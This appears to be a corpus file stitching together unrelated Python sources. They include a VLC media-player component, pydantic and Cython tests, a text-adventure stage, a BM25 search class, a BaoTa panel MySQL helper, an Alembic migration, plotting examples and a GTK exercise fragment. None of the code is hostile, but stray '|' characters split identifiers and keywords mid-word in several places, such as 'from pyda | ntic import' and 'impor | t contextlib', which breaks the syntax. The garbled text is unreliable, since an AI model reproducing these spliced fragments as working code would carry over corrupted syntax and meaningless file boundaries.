except (ConnErr, EOFError):
self._available = False
self._vlc = None
return True
@property
def name(self):
"""Return the name of the device."""
return self._name
@property
def state(self):
"""Return the state of the device."""
return self._state
@property
def available(self) -> bool:
"""Return True if entity is available."""
return self._available
@property
def volume_level(self):
"""Volume level of the media player (0..1)."""
return self._volume
@property
def is_volume_muted(self):
"""Boolean if volume is currently muted."""
return self._muted
@property
def supported_features(self):
"""Flag media player features that are supported."""
return SUPPORT_VLC
@property
def media_content_type(self):
"""Content type of current playing media."""
return MEDIA_TYPE_MUSIC
@property
def media_duration(self):
"""Duration of current playing media in seconds."""
return self._media_duration
@property
def media_position(self):
"""Position of current playing media in seconds."""
return self._media_position
@property
def media_position_updated_at(self):
"""When was the position of the current playing media valid."""
return self._media_position_updated_at
@property
def media_title(self):
"""Title of current playing media."""
return self._media_title
@property
def media_artist(self):
"""Artist of current playing media, music track only."""
return self._media_artist
def media_seek(self, position):
"""Seek the media to a specific location."""
track_length = self._vlc.get_length() / 1000
self._vlc.seek(position / track_length)
def mute_volume(self, mute):
"""Mute the volume."""
if mute:
self._volume_bkp = self._volume
self._volume = 0
self._vlc.set_volume("0")
else:
self._vlc.set_volume(str(self._volume_bkp))
self._volume = self._volume_bkp
self._muted = mute
def set_volume_level(self, volume):
"""Set volume level, range 0..1."""
self._vlc.set_volume(str(volume * 500))
self._volume = volume
def media_play(self):
"""Send play command."""
self._vlc.play()
self._state = STATE_PLAYING
def media_pause(self):
"""Send pause command."""
self._vlc.pause()
self._state = STATE_PAUSED
def media_stop(self):
"""Send stop command."""
self._vlc.stop()
self._state = STATE_IDLE
def play_media(self, media_type, media_id, **kwargs):
"""Play media from a URL or file."""
if media_type != MEDIA_TYPE_MUSIC:
_LOGGER.error(
"Invalid media type %s. Only %s is supported",
media_type,
MEDIA_TYPE_MUSIC,
)
return
self._vlc.add(media_id)
self._state = STATE_PLAYING
def media_previous_track(self):
"""Send previous track command."""
self._vlc.prev()
def media_next_track(self):
"""Send next track command."""
self._vlc.next()
def clear_playlist(self):
"""Clear players playlist."""
self._vlc.clear()
def set_shuffle(self, shuffle):
"""Enable/disable shuffle mode."""
self._vlc.random(shuffle)
| |
import pytest
from pydantic import BaseModel, Extra, Field, ValidationError, create_model, errors, validator
def test_create_model():
model = create_model('FooModel', foo=(str, ...), bar=123)
assert issubclass(model, BaseModel)
assert issubclass(model.__config__, BaseModel.Config)
assert model.__name__ == 'FooModel'
assert model.__fields__.keys() == {'foo', 'bar'}
assert model.__validators__ == {}
assert model.__config__.__name__ == 'Config'
assert model.__module__ == 'pydantic.main'
def test_create_model_usage():
model = create_model('FooModel', foo=(str, ...), bar=123)
m = model(foo='hello')
assert m.foo == 'hello'
assert m.bar == 123
with pytest.raises(ValidationError):
model()
with pytest.raises(ValidationError):
model(foo='hello', bar='xxx')
def test_create_model_pickle(create_module):
"""
Pickle will work for dynamically created model only if it was defined globally with its class name
and module where it's defined was specified
"""
@create_module
def module():
import pickle
from pyda | ntic import create_model
FooModel = create_model('FooModel', foo=(str, ...), bar=123, __module__=__name__)
m = FooModel(foo='hello')
d = pickle.dumps(m)
m2 = pickle.loads(d)
assert m2.foo == m.foo == 'hello'
assert m2.bar == m.bar == 123
assert m2 == m
assert m2 is not m
def test_invalid_name():
with pytest.warns(RuntimeWarning):
mode | l = create_model('FooModel', _foo=(str, ...))
assert len(model.__fields__) == 0
def test_field_wrong_tuple():
with pytest.raises(errors.ConfigError):
create_model('FooModel', foo=(1, 2, 3))
def test_config_and_base():
with pytest.raises(errors.ConfigError):
create_model('FooModel', __config__=BaseModel.Config, __base__=BaseModel)
def test_inheritance():
class BarModel(BaseModel):
x = 1
y = 2
model = create_model('FooModel', foo=(str, ...), bar=(int, 123), __base__=BarModel)
assert model.__fields__.keys() == {'foo', 'bar', 'x', 'y'}
m = model(foo='a', x=4)
assert m.dict() == {'bar': 123, 'foo': 'a', 'x': 4, 'y': 2}
def test_custom_config():
class Config:
fields = {'foo': 'api-foo-field'}
model = create_model('FooModel', foo=(int, ...), __config__=Config)
assert model(**{'api-foo-field': '987'}).foo == 987
assert issubclass(model.__config__, BaseModel.Config)
with pytest.raises(ValidationError):
model(foo=654)
def test_custom_config_inherits():
class Config(BaseModel.Config):
fields = {'foo': 'api-foo-field'}
model = create_model('FooModel', foo=(int, ...), __config__=Config)
assert model(**{'api-foo-field': '987'}).foo == 987
assert issubclass(model.__config__, BaseModel.Config)
with pytest.raises(ValidationError):
model(foo=654)
def test_custom_config_extras():
class Config(BaseModel.Config):
extra = Extra.forbid
model = create_model('FooModel', foo=(int, ...), __config__=Config)
assert model(foo=654)
with pytest.raises(ValidationError):
model(bar=654)
def test_inheritance_validators():
class BarModel(BaseModel):
@validator('a', check_fields=False)
def check_a(cls, v):
if 'foobar' not in v:
raise ValueError('"foobar" not found in a')
return v
model = create_model('FooModel', a='cake', __base__=BarModel)
assert model().a == 'cake'
assert model(a='this is foobar good').a == 'this is foobar good'
with pytest.raises(ValidationError):
model(a='something else')
def test_inheritance_validators_always():
class BarModel(BaseModel):
@validator('a', check_fields=False, always=True)
def check_a(cls, v):
if 'foobar' not in v:
raise ValueError('"foobar" not found in a')
return v
model = create_model('FooModel', a='cake', __base__=BarModel)
with pytest.raises(ValidationError):
model()
assert model(a='this is foobar good').a == 'this is foobar good'
with pytest.raises(ValidationError):
model(a='something else')
def test_inheritance_validators_all():
class BarModel(BaseModel):
@validator('*')
def check_all(cls, v):
return v * 2
model = create_model('FooModel', a=(int, ...), b=(int, ...), __base__=BarModel)
assert model(a=2, b=6).dict() == {'a': 4, 'b': 12}
def test_funky_name():
model = create_model('FooModel', **{'this-is-funky': (int, ...)})
m = model(**{'this-is-funky': '123'})
assert m.dict() == {'this-is-funky': 123}
with pytest.raises(ValidationError) as exc_info:
model()
assert exc_info.value.errors() == [
{'loc': ('this-is-funky',), 'msg': 'field required', 'type': 'value_error.missing'}
]
def test_repeat_base_usage():
class Model(BaseModel):
a: str
assert Model.__fields__.keys() == {'a'}
model = create_model('FooModel', b=1, __base__=Model)
assert Model.__fields__.keys() == {'a'}
assert model.__fields__.keys() == {'a', 'b'}
model2 = create_model('Foo2Model', c=1, __base__=Model)
assert Model.__fields__.keys() == {'a'}
assert model.__fields__.keys() == {'a', 'b'}
assert model2.__fields__.keys() == {'a', 'c'}
model3 = create_model('Foo2Model', d=1, __base__=model)
assert Model.__fields__.keys() == {'a'}
assert model.__fields__.keys() == {'a', 'b'}
assert model2.__fields__.keys() == {'a', 'c'}
assert model3.__fields__.keys() == {'a', 'b', 'd'}
def test_dynamic_and_static():
class A(BaseModel):
x: int
y: float
z: str
DynamicA = create_model('A', x=(int, ...), y=(float, ...), z=(str, ...))
for field_name in ('x', 'y', 'z'):
assert A.__fields__[field_name].default == DynamicA.__fields__[field_name].default
def test_config_field_info_create_model():
class Config:
fields = {'a': {'description': 'descr'}}
m1 = create_model('M1', __config__=Config, a=(str, ...))
assert m1.schema()['properties'] == {'a': {'title': 'A', 'description': 'descr', 'type': 'string'}}
m2 = create_model('M2', __config__=Config, a=(str, Field(...)))
assert m2.schema()['properties'] == {'a': {'title': 'A', 'description': 'descr', 'type': 'string'}}
|
import cython
def test_sizeof():
"""
>>> test_sizeof()
True
True
True
True
True
"""
x = cython.declare(cython.bint)
print(cython.sizeof(x) == cython.sizeof(cython.bint))
print(cython.sizeof(cython.char) <= cython.sizeof(cython.short) <= cython.sizeof(cython.int) <= cython.sizeof(cython.long) <= cython.sizeof(cython.longlong))
print(cython.sizeof(cython.uint) == cython.sizeof(cython.int))
print(cython.sizeof(cython.p_int) == cython.sizeof(cython.p_double))
if cython.compiled:
print(cython.sizeof(cython.char) < cython.sizeof(cython.longlong))
else:
print(cython.sizeof(cython.char) == 1)
## CURRENTLY BROKEN - FIXME!!
## def test_declare(n):
## """
## >>> test_dec | lare(100)
## (100, 100)
## >>> test_declare(100.5)
## (100, 100)
## >>> test_declare(None)
## Traceback (most recent call last):
## ...
## TypeError: an integer is required
## """
## x = cython.declare(cython.int)
## y = cython.declare(cython.int, n)
## if cython.compiled:
## cython.declare(xx=cython.int, yy=cython.long)
## i = sizeof(xx)
## ptr = cython.declare(cython.p_int, cython.address(y))
## return y, ptr[0]
@cython.locals(x=cython. | double, n=cython.int)
def test_cast(x):
"""
>>> test_cast(1.5)
1
"""
n = cython.cast(cython.int, x)
return n
@cython.locals(x=cython.int, y=cython.p_int)
def test_address(x):
"""
>>> test_address(39)
39
"""
y = cython.address(x)
return y[0]
## CURRENTLY BROKEN - FIXME!!
## @cython.locals(x=cython.int)
## @cython.locals(y=cython.bint)
## def test_locals(x):
## """
## >>> test_locals(5)
## True
## """
## y = x
## return y
def test_with_nogil(nogil):
"""
>>> raised = []
>>> class nogil(object):
... def __enter__(self):
... pass
... def __exit__(self, exc_class, exc, tb):
... raised.append(exc)
... return exc_class is None
>>> test_with_nogil(nogil())
WORKS
True
>>> raised
[None]
"""
result = False
with nogil:
print("WORKS")
with cython.nogil:
result = True
return result
## CURRENTLY BROKEN - FIXME!!
## MyUnion = cython.union(n=cython.int, x=cython.double)
## MyStruct = cython.struct(is_integral=cython.bint, data=MyUnion)
## MyStruct2 = cython.typedef(MyStruct[2])
## def test_struct(n, x):
## """
## >>> test_struct(389, 1.64493)
## (389, 1.64493)
## """
## a = cython.declare(MyStruct2)
## a[0] = MyStruct(True, data=MyUnion(n=n))
## a[1] = MyStruct(is_integral=False, data={'x': x})
## return a[0].data.n, a[1].data.x
import cython as cy
from cython import declare, cast, locals, address, typedef, p_void, compiled
from cython import declare as my_declare, locals as my_locals, p_void as my_void_star, typedef as my_typedef, compiled as my_compiled
@my_locals(a=cython.p_void)
def test_imports():
"""
>>> test_imports() # (True, True)
True
"""
a = cython.NULL
b = declare(p_void, cython.NULL)
c = my_declare(my_void_star, cython.NULL)
d = cy.declare(cy.p_void, cython.NULL)
## CURRENTLY BROKEN - FIXME!!
#return a == d, compiled == my_compiled
return compiled == my_compiled
## CURRENTLY BROKEN - FIXME!!
## MyStruct3 = typedef(MyStruct[3])
## MyStruct4 = my_typedef(MyStruct[4])
## MyStruct5 = cy.typedef(MyStruct[5])
def test_declare_c_types(n):
"""
>>> test_declare_c_types(0)
>>> test_declare_c_types(1)
>>> test_declare_c_types(2)
"""
#
b00 = cython.declare(cython.bint, 0)
b01 = cython.declare(cython.bint, 1)
b02 = cython.declare(cython.bint, 2)
#
i00 = cython.declare(cython.uchar, n)
i01 = cython.declare(cython.char, n)
i02 = cython.declare(cython.schar, n)
i03 = cython.declare(cython.ushort, n)
i04 = cython.declare(cython.short, n)
i05 = cython.declare(cython.sshort, n)
i06 = cython.declare(cython.uint, n)
i07 = cython.declare(cython.int, n)
i08 = cython.declare(cython.sint, n)
i09 = cython.declare(cython.slong, n)
i10 = cython.declare(cython.long, n)
i11 = cython.declare(cython.ulong, n)
i12 = cython.declare(cython.slonglong, n)
i13 = cython.declare(cython.longlong, n)
i14 = cython.declare(cython.ulonglong, n)
i20 = cython.declare(cython.Py_ssize_t, n)
i21 = cython.declare(cython.size_t, n)
#
f00 = cython.declare(cython.float, n)
f01 = cython.declare(cython.double, n)
f02 = cython.declare(cython.longdouble, n)
#
#z00 = cython.declare(cython.complex, n+1j)
#z01 = cython.declare(cython.floatcomplex, n+1j)
#z02 = cython.declare(cython.doublecomplex, n+1j)
#z03 = cython.declare(cython.longdoublecomplex, n+1j)
|
"""cairo_museum.py"""
from lib.stage import Stage
class CairoMuseum(Stage):
"""Cairo Museum stage"""
def desc(self):
"""Describe action"""
action = """
After getting the first replicant, you call some old friends and some of them
mentions something about a hippie woman that likes no jokes. You get the next
ship to Cairo and go to a big museum. Everything smells dust and there are a
lot of camels and people around. In an isolated corner, you see a different
woman in bad mood, looking to you from time to time...
"""
self.console.simulate_typing(action)
def look(self):
"""Look action"""
action = """
Everyone seens to be busy looking at the art, mainly the big statues, nothing
suspicious, except for a different woman in the corner...
"""
self.console.simulate_typing(action)
def talk(self):
"""Talk action"""
action = """
You say 'hi' to the woman...
"""
self.console.simulate_typing(action)
| def joke(self):
"""Joke action"""
action = """
You tell a really good joke and an old mummy start laughing...
"""
self.console.simulate_typing(action)
def fight(self):
"""Fight action"""
| action = """
You try to start a fight, but a camel holds you and tells you to calm down...
"""
self.console.simulate_typing(action)
|
# -*- coding: utf-8 -*-
# A search engine based on probabilitistic models of the information retrival.
# Author - Janu Verma
# email - jv367@cornell.edu
# http://januverma.wordpress.com/
# @januverma
import sys
from pydoc import help
import os
from collections import defaultdict
from math import log, sqrt
import operator
class ProbModel:
"""
Implements probabilitistic models for information retrieval.
"""
def __init__(self, directory):
"""
Arguments:
directory - Directory of documents to be searched.
"""
self.corpus = os.listdir(directory)
self.text = {}
for f in self.corpus:
f = os.path.join(directory,f)
with open(f) as doc:
info = doc.read()
self.text[f] = info
def words(self, document):
"""
All the words in a document.
Arguments:
document : A textual document.
Returns:
A list containing all the words i | n the document.
"""
words = document.split()
words = [x.lower() for x in words]
words = [x for x in words if len(x) >= 2and not x.isdigit()]
return words
def word_freq(self, wordlist):
"""
Build a dictionary of words with the fr | equencies of their occurance in the document.
Arguments:
document : A list of all the words in a document.
Returns:
A dictionary containing all the words in the document with their frequencies.
"""
wordFreq = defaultdict(int)
for w in wordlist:
wordFreq[w] += 1
return wordFreq
def vocabalury(self):
"""
All the words in the corpus.
Returns:
A list of all the words in the corpus.
"""
allWords = []
allDocs = self.text
for d in allDocs.keys():
d = allDocs[d]
docWords = self.words(d)
allWords.extend(docWords)
return allWords
def doc_freq(self):
"""
Compute the document frequency of all the terms in the corpus.
Returns:
A dictionary of all the terms in the corpus with their document frequency.
"""
allWords = self.vocabalury()
allWords = set(allWords)
allDocs = self.text
docFreq = defaultdict(int)
for x in allWords:
for d in allDocs.keys():
d = allDocs[d]
docTerms = self.words(d)
if (x in docTerms):
docFreq[x] += 1
return docFreq
def docScore(self, document, query, k, b):
"""
Compute the log odds ratio of the document being relevant to the query.
Arguments:
document : A textual document.
query : The search query.
k : tuning parameter for term frequency.
b : tuning parameter for for document length.
Returns:
A floating variable score
"""
# total number of docs
n = len(self.corpus)
# words in the document
docText = self.words(document)
# length of the document
l = len(docText)
# average length of a document
l_av = float(len(self.vocabalury()))/n
# document frequency dict
df = self.doc_freq()
# words in the document
tokens = self.words(document)
#term frequency dict
tf = self.word_freq(tokens)
# inittalize the score for the document
score = 0
# query
queryWords = self.words(query)
for x in queryWords:
try:
tf_x = tf[x]
except:
continue
try:
df_x = df[x]
except:
continue
# inverse document frequency of the term.
idf = log(n/df_x)
# correction factor
correction = float((k + 1)*(tf_x))/(k*(1-b) + b*(l/(l_av)) + (tf_x))
# total contribution
contribution = idf * correction
score += contribution
return score
def ranking(self, query, k, b):
"""
Ranking of the documents based on their relevance to the query.
Arguments:
query: The search query
Returns:
A dictionary of all the documents in the corpus with their corresponding relevance odds ratio.
"""
if (k != None):
k = k
else:
k = 0
if (b != None):
b = b
else:
b = 0
documents = self.text
rankingDict = defaultdict(float)
for d in documents.keys():
docText = documents[d]
score = self.docScore(docText, query, k, b)
rankingDict[d] = score
return rankingDict
def search(self, query, n_docs, k=None, b=None):
"""
Returns documents which are most relavant to the query.
Ranking is done by decreasing odds ratio for the document to be relevant for the query.
Arguments:
String query : Search query
Integer n_docs : Number of matching documents retrived.
Float k : tuning parameter for term frequency, (0<=k<=1).
A value of 0 corresponds to a binary model (no term frequency),
and a large value corresponds to using raw term frequency
Float b: tuning parameter for for document length, (0<=b<=1).
b = 1 corresponds to fully scaling the term weight by the document length,
while b = 0 corresponds to no length normalization.
Returns:
A list of length n_docs containing documents most relevant to the search query.
The list if sorted in the descending order.
"""
if (n_docs > len(self.corpus)):
n_docs = len(self.corpus)
relevantDocs = []
if (k != None):
k = k
if (b != None):
b = b
rankings = self.ranking(query, k, b)
rankings = sorted(rankings.iteritems(), key=operator.itemgetter(1), reverse=True)
for i in range(n_docs):
u,v = rankings[i]
relevantDocs.append(u)
return relevantDocs
|
#coding: utf-8
# +-------------------------------------------------------------------
# | | 宝塔Linux面板 |
# +-------------------------------------------------------------------
# | Copyright (c) 2015-2016 宝塔软件(http://bt.cn) All rights reserved.
# +-------------------------------------------------------------------
# | Author: 黄文良 <2879625666@qq.com>
# +-------------------------------------------------------------------
import re,os
class panelMysql:
__DB_PASS = None
__DB_USER = 'root'
__DB_PORT = 3306
__DB_HOST = '127.0.0.1'
__DB_CONN = None
__DB_CUR = None
__DB_ERR = None
__DB_HOST_CONF = 'data/mysqlHost.pl';
#连接MYSQL数据库
def __Conn(self):
try:
import public
try:
import MySQLdb
except Exception,ex:
self.__DB_ERR = ex
return False;
try:
myconf = public.readFile('/etc/my.cnf');
rep = "port\s*=\s*([0-9]+)"
self.__DB_PORT = int(re.search(rep,myconf).groups()[0]);
except:
self.__DB_PORT = 3306;
self.__DB_PASS = public.M('config').where('id=?',(1,)).getField('mysql_root');
try:
if os.path.exists(self.__DB_HOST_CONF): self.__DB_HOST = public.readFile(self.__DB_HOST_CONF);
self.__DB_CONN = MySQLdb.connect(host = self.__DB_HOST,user = self.__DB_USER,passwd = self.__DB_PASS,port = self.__DB_PORT,charset="utf8",connect_timeout=1)
except MySQLdb.Error,e:
if e[0] != 2003:
self.__DB_ERR = e
return False
if self.__DB_HOST == 'localhost':
self.__DB_HOST = '127.0.0.1';
else:
self.__DB_HOST = 'localhost';
public.writeFile(self.__DB_HOST_CONF,self.__DB_HOST);
self.__DB_CONN = MySQLdb.connect(host = self.__DB_HOST,user = self.__DB_USER,passwd = self.__DB_PASS,port = self.__DB_PORT,charset="utf8",connect_timeout=1)
self.__DB_CUR = self.__DB_CONN.cursor()
return True
except MySQLdb.Error,e:
self.__DB_ERR = e
return False
def execute(self,sql):
#执行SQL语句返回受影响行
if not self.__Conn(): return self.__DB_ERR
try:
result = self.__DB_CUR.execute(sql)
self.__DB_CONN.commit()
self.__Close()
return result
except Exception,ex:
return ex
def query(self,sql):
#执行SQL语句返回数据集
if not self.__Conn(): return self.__DB_ERR
try:
self.__DB_CUR.execute(sql)
result = self.__DB_CUR.fetchall()
#将元组转换成列表
data = map(list,result)
self.__Close()
return data
except Exception,ex:
return ex
#关闭连接
def __Close(self):
self.__DB_CUR.close()
self.__DB_CONN.close() |
def at_len(the_list):
"""
Takes a list and returns the number
| of atomic elements (basic unit of data)
of the list
:param the_list: a list of elements
:return: the number of atomic elements in the list
" | ""
count = 0
for each_elem in the_list:
if isinstance(each_elem, list):
count += at_len(each_elem)
else:
count += 1
return count
|
import random
class Dice(object):
'''
Generates random numbers by rolling two 'dice'.
The reason for this class existing is so that it can be
mocked and replaced with a deterministic version for
testing.
' | ''
de | f roll(self):
'''
Returns two value: the rolls of the two dice.
'''
roll1 = random.randint(1, 6)
roll2 = random.randint(1, 6)
return roll1, roll2
|
#!/usr/bin/env python
from hdf5handler import HDF5Handler
handler = H | DF5Handler('mydata.hdf5')
handler.open()
for i in range(100):
handler.put(i, 'numbers')
hand | ler.close()
|
"""simplify transa | ction log
Revision ID: 8c2406df6f8
Revises:58732bb5d14b
Create Date: 2014-08-08 01:57:17.144405
"""
# revision identifiers, used by Alembic.
revision = '8c2406df6f8'
down_revision = '58732bb5d14b'
from alembic import op
from sqlalchemy.sql import text
def upgrade():
conn = op.get_bind()
conn.execute(text('''
ALTER TABLE transaction
CHANGE public_snapshot snapshot LONGTEXT,
CHANGE table_name object_type VAR | CHAR(20),
DROP COLUMN private_snapshot,
DROP COLUMN delta,
ADD INDEX `ix_transaction_object_public_id` (`object_public_id`)
'''))
def downgrade():
raise Exception()
|
impor | t contextlib
import os
import shutil
imp | ort tempfile
import numpy
from PIL import Image
from kiva.fonttools import Font
from kiva.constants import MODERN
class DrawingTester(object):
""" Basic drawing tests for graphics contexts.
"""
def setUp(self):
self.directory = tempfile.mkdtemp()
self.filename = os.path.join(self.directory, 'rendered')
self.gc = self.create_graphics_context(300, 300)
self.gc.clear()
self.gc.set_stroke_color((1.0, 0.0, 0.0))
self.gc.set_fill_color((1.0, 0.0, 0.0))
self.gc.set_line_width(5)
def tearDown(self):
del self.gc
shutil.rmtree(self.directory)
def test_line(self):
with self.draw_and_check():
self.gc.begin_path()
self.gc.move_to(107, 204)
self.gc.line_to(107, 104)
self.gc.stroke_path()
def test_rectangle(self):
with self.draw_and_check():
self.gc.begin_path()
self.gc.move_to(107, 104)
self.gc.line_to(107, 184)
self.gc.line_to(187, 184)
self.gc.line_to(187, 104)
self.gc.line_to(107, 104)
self.gc.stroke_path()
def test_rect(self):
with self.draw_and_check():
self.gc.begin_path()
self.gc.rect(0, 0, 200, 200)
self.gc.stroke_path()
def test_circle(self):
with self.draw_and_check():
self.gc.begin_path()
self.gc.arc(150, 150, 100, 0.0, 2 * numpy.pi)
self.gc.stroke_path()
def test_quarter_circle(self):
with self.draw_and_check():
self.gc.begin_path()
self.gc.arc(150, 150, 100, 0.0, numpy.pi / 2)
self.gc.stroke_path()
def test_text(self):
with self.draw_and_check():
font = Font(family=MODERN)
font.size = 24
self.gc.set_font(font)
self.gc.set_text_position(23, 67)
self.gc.show_text("hello kiva")
def test_circle_fill(self):
with self.draw_and_check():
self.gc.begin_path()
self.gc.arc(150, 150, 100, 0.0, 2 * numpy.pi)
self.gc.fill_path()
def test_star_fill(self):
with self.draw_and_check():
self.gc.begin_path()
self.gc.move_to(100, 100)
self.gc.line_to(150, 200)
self.gc.line_to(200, 100)
self.gc.line_to(100, 150)
self.gc.line_to(200, 150)
self.gc.line_to(100, 100)
self.gc.fill_path()
def test_star_eof_fill(self):
with self.draw_and_check():
self.gc.begin_path()
self.gc.move_to(100, 100)
self.gc.line_to(150, 200)
self.gc.line_to(200, 100)
self.gc.line_to(100, 150)
self.gc.line_to(200, 150)
self.gc.line_to(100, 100)
self.gc.eof_fill_path()
def test_circle_clip(self):
with self.draw_and_check():
self.gc.clip_to_rect(150, 150, 100, 100)
self.gc.begin_path()
self.gc.arc(150, 150, 100, 0.0, 2 * numpy.pi)
self.gc.fill_path()
def test_text_clip(self):
with self.draw_and_check():
self.gc.clip_to_rect(23, 77, 100, 23)
font = Font(family=MODERN)
font.size = 24
self.gc.set_font(font)
self.gc.set_text_position(23, 67)
self.gc.show_text("hello kiva")
def test_star_clip(self):
with self.draw_and_check():
self.gc.begin_path()
self.gc.move_to(100, 100)
self.gc.line_to(150, 200)
self.gc.line_to(200, 100)
self.gc.line_to(100, 150)
self.gc.line_to(200, 150)
self.gc.line_to(100, 100)
self.gc.close_path()
self.gc.clip()
self.gc.begin_path()
self.gc.arc(150, 150, 100, 0.0, 2 * numpy.pi)
self.gc.fill_path()
#### Required methods ####################################################
@contextlib.contextmanager
def draw_and_check(self):
""" A context manager to check the result.
"""
raise NotImplementedError()
def create_graphics_context(self, width, length):
""" Create the desired graphics context
"""
raise NotImplementedError()
class DrawingImageTester(DrawingTester):
""" Basic drawing tests for graphics contexts of gui toolkits.
"""
@contextlib.contextmanager
def draw_and_check(self):
yield
filename = "{0}.png".format(self.filename)
self.gc.save(filename)
self.assertImageSavedWithContent(filename)
def assertImageSavedWithContent(self, filename):
""" Load the image and check that there is some content in it.
"""
image = numpy.array(Image.open(filename))
# default is expected to be a totally white image
self.assertEqual(image.shape[:2], (300, 300))
if image.shape[2] == 3:
check = numpy.sum(image == [255, 0, 0], axis=2) == 3
elif image.shape[2] == 4:
check = numpy.sum(image == [255, 0, 0, 255], axis=2) == 4
else:
self.fail(
'Pixel size is not 3 or 4, but {0}'.format(image.shape[2]))
if check.any():
return
self.fail('The image looks empty, no red pixels where drawn')
|
from mpl_toolkits.basemap import Basemap, shiftgrid, maskoceans, interp
import numpy as np
import matplotlib.pyplot as plt
# example showing how to mask out 'wet' areas on a contour or pcolor plot.
topodatin = np.loadtxt('etopo20data.gz')
lonsin = np.loadtxt('etopo20lons.gz')
latsin = np.loadtxt('etopo20lats.gz')
# shift data so lons go from -180 to 180 instead of 20 to 380.
topoin,lons1 = shiftgrid(180.,topodatin,lonsin,start=False)
lats1 = latsin
fig=plt.figure()
# setup basemap
m=Basemap(resolution='l',projection='lcc',lon_0=-100,lat_0=40,width=8.e6,height=6.e6)
lons, lats = np.meshgrid(lons1,lats1)
x, y = m(lons, lats)
# interpolate land/sea mask to topo grid, mask ocean values.
# output may look 'blocky' near coastlines, since data is at much
# lower resolution than land/sea mask.
topo = maskoceans(lons, lats, topoin)
# make contour plot (ocean values will be masked)
CS=m.contourf(x,y,topo,np.arange(-300,3001,50),cmap=plt.cm.jet,extend='both')
#im=m.pcolormesh(x,y,topo,cmap=plt.cm.jet,vmin=-300,vmax=3000)
# draw coastlines.
m.drawcoastlines()
plt.title('ETOPO data with marine areas masked (original grid)')
fig=plt.figure()
# | interpolate topo data to higher resolution grid (to better match
# the land/sea mask). Output looks less 'blocky' near coastlines.
nlats = 3*topoin.shape[0]
nlons = 3*topoin.shape[1]
lons = np.linspace(-180,180,nlons)
lats = np.linspace(-90,90,nlats)
lons, lats = np.meshgrid(lons, lats)
x, y = m(lons, lats)
topo = interp(topoin,lons1,lats1,lons,lat | s,order=1)
# interpolate land/sea mask to topo grid, mask ocean values.
topo = maskoceans(lons, lats, topo)
# make contour plot (ocean values will be masked)
CS=m.contourf(x,y,topo,np.arange(-300,3001,50),cmap=plt.cm.jet,extend='both')
#im=m.pcolormesh(x,y,topo,cmap=plt.cm.jet,vmin=-300,vmax=3000)
# draw coastlines.
m.drawcoastlines()
plt.title('ETOPO data with marine areas masked (data on finer grid)')
plt.show()
|
from gi.repository import Zeitgeist, GLib
log = Zeitgeist.Log.get_default()
mainloop = GLib.MainLoop()
def on_events_received(log, result, data):
events = log.find_events_finish(result)
for i in xrange(events.size()):
event = events.next_value()
if event:
print "Event id:", event.get_property("id")
for i in xrange(event.num_subjects()):
subj = event.get_subject(i)
print " -", subj.get_property("uri")
mainloop.quit()
subject = Zeitgeist.Subject.full("", Zeitgeist.AUDIO, "", "", "", "", "")
event = Zeitgeist.Event()
event.add_subject(subject)
time_range = Zeitgeist.TimeRange.anytime ();
lo | g.find_events(time_range,
[event],
Zeitgeist.StorageState.ANY,
20,
Zeitgeist.ResultType.MOST_RECENT_SUBJECTS,
None,
on_events_received,
None)
main | loop.run()
|
cted": -1,
"pair":self.correspondencesList[index]['indexPair'], "colour": None} ) )
frameVBoxOptions.add(self.vBoxOptions)
frameVBoxCorrespondences.add(self.vBoxCorrespondences)
hBoxExercises.pack_start(frameVBoxOptions, True,True,5)
hBoxExercises.pack_start(frameVBoxCorrespondences, True,True,50)
vBoxWindows.pack_start(frameExercises, True,True,0)
windowSimpleAssociation.add_with_viewport(vBoxWindows)
if stateJson is not None:
self.repaintResumeItems()
else:
self.setAllAvailableSelectionColour()
self.selectFirtImage(firstOptionEventBox)
return windowSimpleAssociation
def repaintResumeItems(self):
for index, value in enumerate(self.optionsSelectionState):
eventBoxOption = self.vBoxOptions.get_children()[index].get_children()[0]
eventBoxCorrespondence = self.vBoxCorrespondences.get_children()[index].get_children()[0]
if value['colour'] is not None:
self.mainWindows.getLogger().debug(value)
self.changeBackgroundColour(eventBoxOption,str(value['colour']['colour']))
valueCorresondence = self.correspondencesSelectionState[index]
self.mainWindows.getLogger().debug(valueCorresondence)
if valueCorresondence['colour'] is not None:
self.changeBackgroundColour(eventBoxCorrespondence, str(valueCorresondence['colour']['colour']))
firstFrameOption = self.vBoxOptions.get_children()[self.currentOptionSelected]
self.fakeSelection(firstFrameOption)
def addEventBoxToVBox(self, eventBox, vBox):
frameEventBox = gtk.EventBox()
frameEventBox.modify_bg(gtk.STATE_NORMAL, gtk.gdk.Color("white"))
eventBox.set_border_width(5)
frameEventBox.add(eventBox)
vBox.pack_start(frameEventBox, False,False,0)
def createEventBox(self, payload, typePayload):
eventBox = gtk.EventBox()
eventBox.set_size_request(EVENTBOX_SCALE[0], EVENTBOX_SCALE[1])
if typePayload == "image":
imageContainer = gtk.Image()
pixbuf = gtk.gdk.pixbuf_new_from_file(payload).scale_simple(IMAGES_SCALE[0], IMAGES_SCALE[1], 2)
imageContainer.set_from_pixbuf(pixbuf)
eventBox.add(imageContainer)
eventBox.modify_ | bg(gtk.STATE_NORMAL, eventBox.get_colormap().alloc_color('white'))
if typePayload == "letter":
letterLabel = gtk.Label(payload)
if len(payload) <= 8:
letterLabel.modify_font(pango.FontDescription(FONT_DESCRIPTION_BI | G))
else:
letterLabel.modify_font(pango.FontDescription(FONT_DESCRIPTION_MEDIUM))
eventBox.add(letterLabel)
eventBox.modify_bg(gtk.STATE_NORMAL, eventBox.get_colormap().alloc_color('white'))
return eventBox
def selectFirtImage(self, firstEvenBox):
availableColour = self.getAvailableSelectionColour()
self.changeBackgroundColour(firstEvenBox, availableColour['colour'])
self.setSelectionStateColour(self.optionsSelectionState, 0, availableColour)
self.currentOptionSelected = 0
frameImageSelected = firstEvenBox.get_parent()
self.fakeSelection(frameImageSelected)
def disorderCorrespondences(self, items):
self.mainWindows.getLogger().debug("Inside to disorderCorrespondences")
optionsList = [None]*len(items)
correspondencesList = [None]*len(items)
indexsList = range(len(items))
originalList = copy.copy(indexsList)
self.mainWindows.getLogger().debug(originalList)
self.mainWindows.getLogger().debug(indexsList)
random.shuffle(indexsList)
while( originalList == indexsList and len(items) > 1):
self.mainWindows.getLogger().debug("Inside to while...")
random.shuffle(indexsList)
self.mainWindows.getLogger().debug(originalList)
self.mainWindows.getLogger().debug(indexsList)
for index, item in enumerate(items):
optionsList[index] = {"option":{"type":item.option.type, "value":item.option.value}, \
"indexPair": indexsList[index]}
correspondencesList[indexsList[index]] = ( {"correspondence":{"type":item.correspondence.type,
"value":item.correspondence.value}, "indexPair": index} )
return (optionsList, correspondencesList)
